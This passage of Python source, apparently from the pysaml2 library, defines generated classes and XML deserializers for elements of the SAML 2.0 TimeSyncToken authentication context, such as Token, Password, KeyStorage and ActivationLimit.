def medium_type__from_string(xml_string):
    """Deserialize a MediumType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(MediumType_, xml_string)
class KeyStorageType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeyStorageType
    element """
    c_tag = 'KeyStorageType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Required attribute typed by the MediumType_ class defined above.
    c_attributes['medium'] = ('medium', MediumType_, True)

    def __init__(self,
                 medium=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.medium = medium
def key_storage_type__from_string(xml_string):
    """Deserialize a KeyStorageType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(KeyStorageType_, xml_string)
class ExtensionType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ExtensionType
    element """
    # Open extension point: no declared attributes or children of its own.
    c_tag = 'ExtensionType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
def extension_type__from_string(xml_string):
    """Deserialize an ExtensionType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(ExtensionType_, xml_string)
class TimeSyncTokenType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
    TimeSyncTokenType element """
    c_tag = 'TimeSyncTokenType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # All three attributes are required: (python name, value type, required).
    c_attributes['DeviceType'] = ('device_type', 'None', True)
    c_attributes['SeedLength'] = ('seed_length', 'None', True)
    c_attributes['DeviceInHand'] = ('device_in_hand', 'None', True)

    def __init__(self,
                 device_type=None,
                 seed_length=None,
                 device_in_hand=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.device_type = device_type
        self.seed_length = seed_length
        self.device_in_hand = device_in_hand
def time_sync_token_type__from_string(xml_string):
    """Deserialize a TimeSyncTokenType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(TimeSyncTokenType_, xml_string)
class KeySharing(KeySharingType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeySharing
    element """
    # Concrete element for KeySharingType_; schema tables re-copied so they
    # stay independent of the type class.
    c_tag = 'KeySharing'
    c_namespace = NAMESPACE
    c_children = KeySharingType_.c_children.copy()
    c_attributes = KeySharingType_.c_attributes.copy()
    c_child_order = KeySharingType_.c_child_order[:]
    c_cardinality = KeySharingType_.c_cardinality.copy()
def key_sharing_from_string(xml_string):
    """Deserialize a KeySharing element from its XML string form."""
    return saml2.create_class_from_xml_string(KeySharing, xml_string)
class KeyStorage(KeyStorageType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeyStorage
    element """
    # Concrete element for KeyStorageType_.
    c_tag = 'KeyStorage'
    c_namespace = NAMESPACE
    c_children = KeyStorageType_.c_children.copy()
    c_attributes = KeyStorageType_.c_attributes.copy()
    c_child_order = KeyStorageType_.c_child_order[:]
    c_cardinality = KeyStorageType_.c_cardinality.copy()
def key_storage_from_string(xml_string):
    """Deserialize a KeyStorage element from its XML string form."""
    return saml2.create_class_from_xml_string(KeyStorage, xml_string)
class TimeSyncToken(TimeSyncTokenType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:TimeSyncToken
    element """
    # Concrete element for TimeSyncTokenType_.
    c_tag = 'TimeSyncToken'
    c_namespace = NAMESPACE
    c_children = TimeSyncTokenType_.c_children.copy()
    c_attributes = TimeSyncTokenType_.c_attributes.copy()
    c_child_order = TimeSyncTokenType_.c_child_order[:]
    c_cardinality = TimeSyncTokenType_.c_cardinality.copy()
def time_sync_token_from_string(xml_string):
    """Deserialize a TimeSyncToken element from its XML string form."""
    return saml2.create_class_from_xml_string(TimeSyncToken, xml_string)
class Length(LengthType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Length element """
    # Concrete element for LengthType_.
    c_tag = 'Length'
    c_namespace = NAMESPACE
    c_children = LengthType_.c_children.copy()
    c_attributes = LengthType_.c_attributes.copy()
    c_child_order = LengthType_.c_child_order[:]
    c_cardinality = LengthType_.c_cardinality.copy()
def length_from_string(xml_string):
    """Deserialize a Length element from its XML string form."""
    return saml2.create_class_from_xml_string(Length, xml_string)
class GoverningAgreementRef(GoverningAgreementRefType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:GoverningAgreementRef element """
    # Concrete element for GoverningAgreementRefType_.
    c_tag = 'GoverningAgreementRef'
    c_namespace = NAMESPACE
    c_children = GoverningAgreementRefType_.c_children.copy()
    c_attributes = GoverningAgreementRefType_.c_attributes.copy()
    c_child_order = GoverningAgreementRefType_.c_child_order[:]
    c_cardinality = GoverningAgreementRefType_.c_cardinality.copy()
def governing_agreement_ref_from_string(xml_string):
    """Deserialize a GoverningAgreementRef element from its XML string form."""
    return saml2.create_class_from_xml_string(GoverningAgreementRef, xml_string)
class GoverningAgreementsType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
    GoverningAgreementsType element """
    c_tag = 'GoverningAgreementsType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Child entry: qualified tag -> (python name, child class).  A list value
    # marks the child as repeatable; cardinality min=1 makes it mandatory.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}GoverningAgreementRef'] = (
        'governing_agreement_ref', [GoverningAgreementRef])
    c_cardinality['governing_agreement_ref'] = {"min": 1}
    c_child_order.extend(['governing_agreement_ref'])

    def __init__(self,
                 governing_agreement_ref=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.governing_agreement_ref = governing_agreement_ref or []
def governing_agreements_type__from_string(xml_string):
    """Deserialize a GoverningAgreementsType_ from its XML string form."""
    return saml2.create_class_from_xml_string(GoverningAgreementsType_,
                                              xml_string)
class RestrictedPasswordType_Length(RestrictedLengthType_):
    # Length child as used inside RestrictedPasswordType_; shares the
    # restricted (required-min) length schema.
    c_tag = 'Length'
    c_namespace = NAMESPACE
    c_children = RestrictedLengthType_.c_children.copy()
    c_attributes = RestrictedLengthType_.c_attributes.copy()
    c_child_order = RestrictedLengthType_.c_child_order[:]
    c_cardinality = RestrictedLengthType_.c_cardinality.copy()
def restricted_password_type__length_from_string(xml_string):
    """Deserialize a RestrictedPasswordType_Length from its XML string form."""
    return saml2.create_class_from_xml_string(RestrictedPasswordType_Length,
                                              xml_string)
class Alphabet(AlphabetType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Alphabet element """
    # Concrete element for AlphabetType_.
    c_tag = 'Alphabet'
    c_namespace = NAMESPACE
    c_children = AlphabetType_.c_children.copy()
    c_attributes = AlphabetType_.c_attributes.copy()
    c_child_order = AlphabetType_.c_child_order[:]
    c_cardinality = AlphabetType_.c_cardinality.copy()
def alphabet_from_string(xml_string):
    """Deserialize an Alphabet element from its XML string form."""
    return saml2.create_class_from_xml_string(Alphabet, xml_string)
class ActivationLimitDuration(ActivationLimitDurationType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationLimitDuration element """
    # Concrete element for ActivationLimitDurationType_.
    c_tag = 'ActivationLimitDuration'
    c_namespace = NAMESPACE
    c_children = ActivationLimitDurationType_.c_children.copy()
    c_attributes = ActivationLimitDurationType_.c_attributes.copy()
    c_child_order = ActivationLimitDurationType_.c_child_order[:]
    c_cardinality = ActivationLimitDurationType_.c_cardinality.copy()
def activation_limit_duration_from_string(xml_string):
    """Deserialize an ActivationLimitDuration element from its XML string form."""
    return saml2.create_class_from_xml_string(ActivationLimitDuration,
                                              xml_string)
class ActivationLimitUsages(ActivationLimitUsagesType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationLimitUsages element """
    # Concrete element for ActivationLimitUsagesType_.
    c_tag = 'ActivationLimitUsages'
    c_namespace = NAMESPACE
    c_children = ActivationLimitUsagesType_.c_children.copy()
    c_attributes = ActivationLimitUsagesType_.c_attributes.copy()
    c_child_order = ActivationLimitUsagesType_.c_child_order[:]
    c_cardinality = ActivationLimitUsagesType_.c_cardinality.copy()
def activation_limit_usages_from_string(xml_string):
    """Deserialize an ActivationLimitUsages element from its XML string form."""
    return saml2.create_class_from_xml_string(ActivationLimitUsages, xml_string)
class ActivationLimitSession(ActivationLimitSessionType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationLimitSession element """
    # Concrete element for ActivationLimitSessionType_.
    c_tag = 'ActivationLimitSession'
    c_namespace = NAMESPACE
    c_children = ActivationLimitSessionType_.c_children.copy()
    c_attributes = ActivationLimitSessionType_.c_attributes.copy()
    c_child_order = ActivationLimitSessionType_.c_child_order[:]
    c_cardinality = ActivationLimitSessionType_.c_cardinality.copy()
def activation_limit_session_from_string(xml_string):
    """Deserialize an ActivationLimitSession element from its XML string form."""
    return saml2.create_class_from_xml_string(ActivationLimitSession,
                                              xml_string)
class Extension(ExtensionType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Extension element """
    # Concrete element for ExtensionType_.
    c_tag = 'Extension'
    c_namespace = NAMESPACE
    c_children = ExtensionType_.c_children.copy()
    c_attributes = ExtensionType_.c_attributes.copy()
    c_child_order = ExtensionType_.c_child_order[:]
    c_cardinality = ExtensionType_.c_cardinality.copy()
def extension_from_string(xml_string):
    """Deserialize an Extension element from its XML string form."""
    return saml2.create_class_from_xml_string(Extension, xml_string)
class TokenType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:TokenType element """
    c_tag = 'TokenType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Child entries: qualified tag -> (python name, child class); a list
    # value marks a repeatable child (extension: min 0 = optional).
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}TimeSyncToken'] = (
        'time_sync_token', TimeSyncToken)
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(['time_sync_token', 'extension'])

    def __init__(self,
                 time_sync_token=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.time_sync_token = time_sync_token
        self.extension = extension or []
def token_type__from_string(xml_string):
    """Deserialize a TokenType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(TokenType_, xml_string)
class Token(TokenType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Token element """
    # Concrete element for TokenType_.
    c_tag = 'Token'
    c_namespace = NAMESPACE
    c_children = TokenType_.c_children.copy()
    c_attributes = TokenType_.c_attributes.copy()
    c_child_order = TokenType_.c_child_order[:]
    c_cardinality = TokenType_.c_cardinality.copy()
def token_from_string(xml_string):
    """Deserialize a Token element from its XML string form."""
    return saml2.create_class_from_xml_string(Token, xml_string)
class SharedSecretChallengeResponseType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SharedSecretChallengeResponseType element """
    c_tag = 'SharedSecretChallengeResponseType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Repeatable optional Extension children plus an optional 'method'
    # anyURI attribute.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_attributes['method'] = ('method', 'anyURI', False)
    c_child_order.extend(['extension'])

    def __init__(self,
                 extension=None,
                 method=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.extension = extension or []
        self.method = method
def shared_secret_challenge_response_type__from_string(xml_string):
    """Deserialize a SharedSecretChallengeResponseType_ from its XML string form."""
    return saml2.create_class_from_xml_string(
        SharedSecretChallengeResponseType_, xml_string)
class PublicKeyType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PublicKeyType element """
    c_tag = 'PublicKeyType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Repeatable optional Extension children plus an optional
    # 'keyValidation' attribute.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_attributes['keyValidation'] = ('key_validation', 'None', False)
    c_child_order.extend(['extension'])

    def __init__(self,
                 extension=None,
                 key_validation=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.extension = extension or []
        self.key_validation = key_validation
def public_key_type__from_string(xml_string):
    """Deserialize a PublicKeyType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(PublicKeyType_, xml_string)
class GoverningAgreements(GoverningAgreementsType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:GoverningAgreements element """
    # Concrete element for GoverningAgreementsType_.
    c_tag = 'GoverningAgreements'
    c_namespace = NAMESPACE
    c_children = GoverningAgreementsType_.c_children.copy()
    c_attributes = GoverningAgreementsType_.c_attributes.copy()
    c_child_order = GoverningAgreementsType_.c_child_order[:]
    c_cardinality = GoverningAgreementsType_.c_cardinality.copy()
def governing_agreements_from_string(xml_string):
    """Deserialize a GoverningAgreements element from its XML string form."""
    return saml2.create_class_from_xml_string(GoverningAgreements, xml_string)
class PasswordType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PasswordType element """
    c_tag = 'PasswordType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Optional single-occurrence children (Length, Alphabet, Generation),
    # repeatable optional Extension children, and an optional
    # 'ExternalVerification' anyURI attribute.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Length'] = (
        'length', Length)
    c_cardinality['length'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Alphabet'] = (
        'alphabet', Alphabet)
    c_cardinality['alphabet'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Generation'] = (
        'generation', Generation)
    c_cardinality['generation'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_attributes['ExternalVerification'] = (
        'external_verification', 'anyURI', False)
    c_child_order.extend(['length', 'alphabet', 'generation', 'extension'])

    def __init__(self,
                 length=None,
                 alphabet=None,
                 generation=None,
                 extension=None,
                 external_verification=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.length = length
        self.alphabet = alphabet
        self.generation = generation
        self.extension = extension or []
        self.external_verification = external_verification
def password_type__from_string(xml_string):
    """Deserialize a PasswordType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(PasswordType_, xml_string)
class RestrictedPasswordType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:RestrictedPasswordType element """
    c_tag = 'RestrictedPasswordType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Like PasswordType_ but the Length child uses the restricted variant
    # (required min) and there is no Alphabet child.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Length'] = (
        'length', RestrictedPasswordType_Length)
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Generation'] = (
        'generation', Generation)
    c_cardinality['generation'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_attributes['ExternalVerification'] = (
        'external_verification', 'anyURI', False)
    c_child_order.extend(['length', 'generation', 'extension'])

    def __init__(self,
                 length=None,
                 generation=None,
                 extension=None,
                 external_verification=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.length = length
        self.generation = generation
        self.extension = extension or []
        self.external_verification = external_verification
def restricted_password_type__from_string(xml_string):
    """Build a RestrictedPasswordType_ instance by parsing *xml_string*."""
    return saml2.create_class_from_xml_string(RestrictedPasswordType_,
                                              xml_string)
class ActivationLimitType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationLimitType element """

    c_tag = 'ActivationLimitType'
    c_namespace = NAMESPACE
    # Copies keep SamlBase's shared registries untouched.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Three optional, mutually-independent children (each 0..1).
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ActivationLimitDuration'] = (
        'activation_limit_duration', ActivationLimitDuration)
    c_cardinality['activation_limit_duration'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ActivationLimitUsages'] = (
        'activation_limit_usages', ActivationLimitUsages)
    c_cardinality['activation_limit_usages'] = {"min": 0, "max": 1}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ActivationLimitSession'] = (
        'activation_limit_session', ActivationLimitSession)
    c_cardinality['activation_limit_session'] = {"min": 0, "max": 1}
    c_child_order.extend(
        ['activation_limit_duration', 'activation_limit_usages',
         'activation_limit_session'])

    def __init__(self,
                 activation_limit_duration=None,
                 activation_limit_usages=None,
                 activation_limit_session=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        """Initialize the element's child-element slots."""
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.activation_limit_duration = activation_limit_duration
        self.activation_limit_usages = activation_limit_usages
        self.activation_limit_session = activation_limit_session
def activation_limit_type__from_string(xml_string):
    """Build an ActivationLimitType_ instance by parsing *xml_string*."""
    return saml2.create_class_from_xml_string(ActivationLimitType_, xml_string)
class ExtensionOnlyType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ExtensionOnlyType element """

    c_tag = 'ExtensionOnlyType'
    c_namespace = NAMESPACE
    # Copies keep SamlBase's shared registries untouched.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Only child: a repeatable (0..n) Extension element.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
        'extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(['extension'])

    def __init__(self,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        """Initialize the element; *extension* defaults to an empty list."""
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.extension = extension or []
def extension_only_type__from_string(xml_string):
    """Build an ExtensionOnlyType_ instance by parsing *xml_string*."""
    return saml2.create_class_from_xml_string(ExtensionOnlyType_, xml_string)
class PrincipalAuthenticationMechanismType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PrincipalAuthenticationMechanismType element """

    c_tag = 'PrincipalAuthenticationMechanismType'
    c_namespace = NAMESPACE
    # Copies keep SamlBase's shared registries untouched.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Single Token child; no cardinality entry means the default applies.
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Token'] = (
        'token', Token)
    c_child_order.extend(['token'])

    def __init__(self,
                 token=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        """Initialize the element's Token child slot."""
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.token = token
def principal_authentication_mechanism_type__from_string(xml_string):
    """Build a PrincipalAuthenticationMechanismType_ instance from XML."""
    return saml2.create_class_from_xml_string(
        PrincipalAuthenticationMechanismType_, xml_string)
class WrittenConsent(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:WrittenConsent element."""

    c_tag = 'WrittenConsent'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def written_consent_from_string(xml_string):
    """Parse *xml_string* into a WrittenConsent instance."""
    return saml2.create_class_from_xml_string(WrittenConsent, xml_string)


class SubscriberLineNumber(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SubscriberLineNumber element."""

    c_tag = 'SubscriberLineNumber'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def subscriber_line_number_from_string(xml_string):
    """Parse *xml_string* into a SubscriberLineNumber instance."""
    return saml2.create_class_from_xml_string(SubscriberLineNumber, xml_string)


class UserSuffix(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:UserSuffix element."""

    c_tag = 'UserSuffix'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def user_suffix_from_string(xml_string):
    """Parse *xml_string* into a UserSuffix instance."""
    return saml2.create_class_from_xml_string(UserSuffix, xml_string)
class Password(PasswordType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Password element."""

    c_tag = 'Password'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(PasswordType_.c_children)
    c_attributes = dict(PasswordType_.c_attributes)
    c_child_order = list(PasswordType_.c_child_order)
    c_cardinality = dict(PasswordType_.c_cardinality)


def password_from_string(xml_string):
    """Parse *xml_string* into a Password instance."""
    return saml2.create_class_from_xml_string(Password, xml_string)
class Smartcard(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Smartcard element."""

    c_tag = 'Smartcard'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def smartcard_from_string(xml_string):
    """Parse *xml_string* into a Smartcard instance."""
    return saml2.create_class_from_xml_string(Smartcard, xml_string)


class ActivationLimit(ActivationLimitType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationLimit element."""

    c_tag = 'ActivationLimit'
    c_namespace = NAMESPACE
    c_children = dict(ActivationLimitType_.c_children)
    c_attributes = dict(ActivationLimitType_.c_attributes)
    c_child_order = list(ActivationLimitType_.c_child_order)
    c_cardinality = dict(ActivationLimitType_.c_cardinality)


def activation_limit_from_string(xml_string):
    """Parse *xml_string* into an ActivationLimit instance."""
    return saml2.create_class_from_xml_string(ActivationLimit, xml_string)
class PrincipalAuthenticationMechanism(PrincipalAuthenticationMechanismType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PrincipalAuthenticationMechanism element."""

    c_tag = 'PrincipalAuthenticationMechanism'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(PrincipalAuthenticationMechanismType_.c_children)
    c_attributes = dict(PrincipalAuthenticationMechanismType_.c_attributes)
    c_child_order = list(PrincipalAuthenticationMechanismType_.c_child_order)
    c_cardinality = dict(PrincipalAuthenticationMechanismType_.c_cardinality)


def principal_authentication_mechanism_from_string(xml_string):
    """Parse *xml_string* into a PrincipalAuthenticationMechanism instance."""
    return saml2.create_class_from_xml_string(PrincipalAuthenticationMechanism,
                                              xml_string)
class PreviousSession(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PreviousSession element."""

    c_tag = 'PreviousSession'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def previous_session_from_string(xml_string):
    """Parse *xml_string* into a PreviousSession instance."""
    return saml2.create_class_from_xml_string(PreviousSession, xml_string)


class ResumeSession(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ResumeSession element."""

    c_tag = 'ResumeSession'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def resume_session_from_string(xml_string):
    """Parse *xml_string* into a ResumeSession instance."""
    return saml2.create_class_from_xml_string(ResumeSession, xml_string)


class ZeroKnowledge(ExtensionOnlyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ZeroKnowledge element."""

    c_tag = 'ZeroKnowledge'
    c_namespace = NAMESPACE
    c_children = dict(ExtensionOnlyType_.c_children)
    c_attributes = dict(ExtensionOnlyType_.c_attributes)
    c_child_order = list(ExtensionOnlyType_.c_child_order)
    c_cardinality = dict(ExtensionOnlyType_.c_cardinality)


def zero_knowledge_from_string(xml_string):
    """Parse *xml_string* into a ZeroKnowledge instance."""
    return saml2.create_class_from_xml_string(ZeroKnowledge, xml_string)
class SharedSecretChallengeResponse(SharedSecretChallengeResponseType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SharedSecretChallengeResponse element."""

    c_tag = 'SharedSecretChallengeResponse'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(SharedSecretChallengeResponseType_.c_children)
    c_attributes = dict(SharedSecretChallengeResponseType_.c_attributes)
    c_child_order = list(SharedSecretChallengeResponseType_.c_child_order)
    c_cardinality = dict(SharedSecretChallengeResponseType_.c_cardinality)


def shared_secret_challenge_response_from_string(xml_string):
    """Parse *xml_string* into a SharedSecretChallengeResponse instance."""
    return saml2.create_class_from_xml_string(SharedSecretChallengeResponse,
                                              xml_string)
class DigSig(PublicKeyType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:DigSig element."""

    c_tag = 'DigSig'
    c_namespace = NAMESPACE
    # Independent copies of the parent's schema tables.
    c_children = dict(PublicKeyType_.c_children)
    c_attributes = dict(PublicKeyType_.c_attributes)
    c_child_order = list(PublicKeyType_.c_child_order)
    c_cardinality = dict(PublicKeyType_.c_cardinality)


